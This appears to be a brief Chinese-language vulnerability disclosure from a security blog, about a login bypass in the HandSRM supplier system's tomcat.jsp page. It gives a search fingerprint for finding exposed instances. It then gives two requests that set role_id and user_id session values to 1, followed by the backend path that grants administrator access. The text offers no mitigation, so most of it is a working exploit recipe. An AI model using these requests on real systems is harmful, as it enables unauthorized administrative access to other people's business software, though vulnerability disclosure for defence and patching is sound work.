HandSRM tomcat.jsp 文件存在登陆绕过漏洞, 攻击者通过发送请求包,可以获取后台管理员权限
HandSRM
web.body="HandSRM"
登陆页面
验证POC (Tomcat session操控)
/tomcat.jsp?dataName=role_id&dataValue=1
/tomcat.jsp?dataName=user_id&dataValue=1
访问跳转后台
/main.screen
456 篇文章
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!